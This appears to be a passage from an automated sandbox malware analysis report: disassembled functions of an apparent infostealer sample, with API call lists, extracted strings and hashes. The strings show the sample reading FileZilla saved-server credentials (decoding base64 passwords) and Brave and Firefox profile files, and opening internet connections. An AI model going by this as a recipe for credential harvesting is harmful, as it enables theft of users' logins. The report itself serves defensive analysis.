                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7401F
                            • lstrlen.KERNEL32(00BFCD98), ref: 00D7402E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74056
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D74061
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7408A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D740CE
                            • lstrcat.KERNEL32(00000000), ref: 00D740DB
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00D742D9
                            • FindClose.KERNEL32(00000000), ref: 00D742E8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 1006159827-1013718255
                            • Opcode ID: 924aee22953c131cbeb255cd62bc7d9faaac25236dacb19fae9c3ce8746baae8
                            • Instruction ID: 91852bd2d6f9830c3458046e16a627b92008d64a1d1b6fc2eafa90396d392455
                            • Opcode Fuzzy Hash: 924aee22953c131cbeb255cd62bc7d9faaac25236dacb19fae9c3ce8746baae8
                            • Instruction Fuzzy Hash: 3262983191161A9BCB21EFB8DC49AAE77B9FF44300F098129F81997250EB74DE45DBB0
                            Function 00D76960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76995
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00D769C8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76A02
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76A29
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D76A34
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76A5D
                            • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00D76A77
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76A99
                            • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00D76AA5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76AD0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76B00
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00D76B35
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76B9D
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76BCD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 313953988-555421843
                            • Opcode ID: cc49e33192dfcfa9d3eeefbda11c2d52750420f9b91805fa7117f2f14caed903
                            • Instruction ID: 2c68e6e22cc1afaf088bab20d5a581b61a38cece104ae655b882aca3872bab05
                            • Opcode Fuzzy Hash: cc49e33192dfcfa9d3eeefbda11c2d52750420f9b91805fa7117f2f14caed903
                            • Instruction Fuzzy Hash: AF42B230A15A1AAFDB21EBB4DC49A6E7BB9EF44700F089419F909E7251FB74D901CB70
                            Function 00D6DB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6DBC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DBE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DBEF
                            • lstrlen.KERNEL32(00D94CA8), ref: 00D6DBFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DC17
                            • lstrcat.KERNEL32(00000000,00D94CA8), ref: 00D6DC23
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DC4C
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6DC8F
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6DCBF
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D6DCD0
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D6DCF0
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D6DD0A
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D6DD1D
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6DD47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DD70
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DD7B
                            • lstrlen.KERNEL32(00D91794), ref: 00D6DD86
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DDA3
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6DDAF
                            • lstrlen.KERNEL32(?), ref: 00D6DDBC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DDDF
                            • lstrcat.KERNEL32(00000000,?), ref: 00D6DDED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DE19
                            • lstrlen.KERNEL32(00D91794), ref: 00D6DE3D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6DE6F
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6DE7B
                            • lstrlen.KERNEL32(00BF8E60), ref: 00D6DE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DEB0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DEBB
                            • lstrlen.KERNEL32(00D91794), ref: 00D6DEC6
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6DEE6
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6DEF2
                            • lstrlen.KERNEL32(00BF8F20), ref: 00D6DF01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DF27
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DF32
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DF5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DFA5
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6DFB1
                            • lstrlen.KERNEL32(00BF8E60), ref: 00D6DFC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DFE9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DFF4
                            • lstrlen.KERNEL32(00D91794), ref: 00D6DFFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E022
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6E02E
                            • lstrlen.KERNEL32(00BF8F20), ref: 00D6E03D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E063
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6E06E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E09A
                            • StrCmpCA.SHLWAPI(?,Brave), ref: 00D6E0CD
                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 00D6E0E7
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6E11F
                            • lstrlen.KERNEL32(00BFCD98), ref: 00D6E12E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E155
                            • lstrcat.KERNEL32(00000000,?), ref: 00D6E15D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E19F
                            • lstrcat.KERNEL32(00000000), ref: 00D6E1A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E1D0
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00D6E1F9
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6E22F
                            • lstrlen.KERNEL32(00BF8F90), ref: 00D6E23D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E261
                            • lstrcat.KERNEL32(00000000,00BF8F90), ref: 00D6E269
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00D6E988
                            • FindClose.KERNEL32(00000000), ref: 00D6E997
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                            • String ID: Brave$Preferences$\Brave\Preferences
                            • API String ID: 1346089424-1230934161
                            • Opcode ID: 7ad9ad1b352f809fa03b422a9fedb161e1a10b24a7a01a594d7862f6b6ef44a9
                            • Instruction ID: af24ff777229a9151dcb87d1bea22105a1a0729781c176b9cbd3a4c0e1412523
                            • Opcode Fuzzy Hash: 7ad9ad1b352f809fa03b422a9fedb161e1a10b24a7a01a594d7862f6b6ef44a9
                            • Instruction Fuzzy Hash: C8527B70A1160A9FCB21EFB8DC89AAE77B9EF48300F094529F806D7251DB74DD458BB0
                            Function 00D660D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D660FF
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D66152
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D66185
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D661B5
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D661F0
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D66223
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D66233
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 497b2d3463f4371ce80dbd8994f8318ec4c0dd0b403a3abd37153179dab2a7b4
                            • Instruction ID: 2117dde4be69f0056af22d29cafb3540026f03e64815430e069e44f617fba93d
                            • Opcode Fuzzy Hash: 497b2d3463f4371ce80dbd8994f8318ec4c0dd0b403a3abd37153179dab2a7b4
                            • Instruction Fuzzy Hash: 98527B3191161A9BDB21EFB8DC49AAE77B9EF48300F194029F815E7251DB74ED02CBB0
                            Function 00D76B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76B9D
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76BCD
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76BFD
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76C2F
                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00D76C3C
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D76C43
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00D76C5A
                            • lstrlen.KERNEL32(00000000), ref: 00D76C65
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76CA8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76CCF
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 00D76CE2
                            • lstrlen.KERNEL32(00000000), ref: 00D76CED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76D30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76D57
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00D76D6A
                            • lstrlen.KERNEL32(00000000), ref: 00D76D75
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76DB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76DDF
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00D76DF2
                            • lstrlen.KERNEL32(00000000), ref: 00D76E01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76E49
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76E71
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00D76E94
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00D76EA8
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00D76EC9
                            • LocalFree.KERNEL32(00000000), ref: 00D76ED4
                            • lstrlen.KERNEL32(?), ref: 00D76F6E
                            • lstrlen.KERNEL32(?), ref: 00D76F81
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 2641759534-2314656281
                            • Opcode ID: 8faf8c8d992678b6f009d6cd2a7c924ba1fe1c5a7204135382677ea932b3840c
                            • Instruction ID: 7a66a4c95af1da5cc0ce3ea2094af01ba3d9224091901e62395296010555bd5a
                            • Opcode Fuzzy Hash: 8faf8c8d992678b6f009d6cd2a7c924ba1fe1c5a7204135382677ea932b3840c
                            • Instruction Fuzzy Hash: 6302D230A55619AFDB21EBB4CC49E6E7BB9EF04704F089419F90AE7251FB74D9018B70
                            Function 00D74B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D74B51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74B74
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D74B7F
                            • lstrlen.KERNEL32(00D94CA8), ref: 00D74B8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74BA7
                            • lstrcat.KERNEL32(00000000,00D94CA8), ref: 00D74BB3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74BDE
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D74BFA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: prefs.js
                            • API String ID: 2567437900-3783873740
                            • Opcode ID: 9113e27b11bc0aaac34b209da4e3635d8c33f8c92b2bef18cac7216b36ec75f9
                            • Instruction ID: d424547a151819493ec40cfa2424f96f45b44f257ccf8a2f240875dfd963d585
                            • Opcode Fuzzy Hash: 9113e27b11bc0aaac34b209da4e3635d8c33f8c92b2bef18cac7216b36ec75f9
                            • Instruction Fuzzy Hash: 21923D70A016058FDB25CF29D948A69B7F5BF44314F1DC0AEE80D9B2A5E7B1DC82CB61
                            Function 00D71250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D71291
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D712B4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D712BF
                            • lstrlen.KERNEL32(00D94CA8), ref: 00D712CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D712E7
                            • lstrcat.KERNEL32(00000000,00D94CA8), ref: 00D712F3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7131E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D7133A
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D7135C
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D71376
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D713AF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D713D7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D713E2
                            • lstrlen.KERNEL32(00D91794), ref: 00D713ED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7140A
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71416
                            • lstrlen.KERNEL32(?), ref: 00D71423
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71443
                            • lstrcat.KERNEL32(00000000,?), ref: 00D71451
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7147A
                            • StrCmpCA.SHLWAPI(?,00BFCF90), ref: 00D714A3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D714E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7150D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71535
                            • StrCmpCA.SHLWAPI(?,00BFDA00), ref: 00D71552
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D71593
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D715BC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D715E4
                            • StrCmpCA.SHLWAPI(?,00BFCF30), ref: 00D71602
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71633
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7165C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D71685
                            • StrCmpCA.SHLWAPI(?,00BFD008), ref: 00D716B3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D716F4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7171D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71745
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D71796
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D717BE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D717F5
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00D7181C
                            • FindClose.KERNEL32(00000000), ref: 00D7182B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
